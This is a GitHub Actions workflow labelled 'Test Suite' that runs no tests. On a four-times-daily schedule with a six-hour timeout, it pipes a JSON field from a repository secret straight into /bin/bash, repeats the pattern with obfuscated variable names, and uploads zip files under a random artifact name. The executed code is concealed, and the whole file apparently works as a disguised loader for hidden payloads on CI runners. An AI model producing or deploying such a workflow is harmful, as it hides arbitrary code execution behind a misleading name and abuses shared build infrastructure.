name: Test Suite
on:
  workflow_dispatch:

  schedule:
    - cron: '23 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          ch3: ${{ secrets.ch3 }}
        run: |
          printf '%s' "$ch3" | jq -r .p8109 | /bin/bash
          echo $hjtg8 | jq -r .vsnjd9 | /bin/bash
          echo $tlxab58102 | jq -r .y1853 | /bin/bash
          echo $bal253 | jq -r .x22 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: gXNtfJIG
          path: "*.zip"
          retention-days: 1
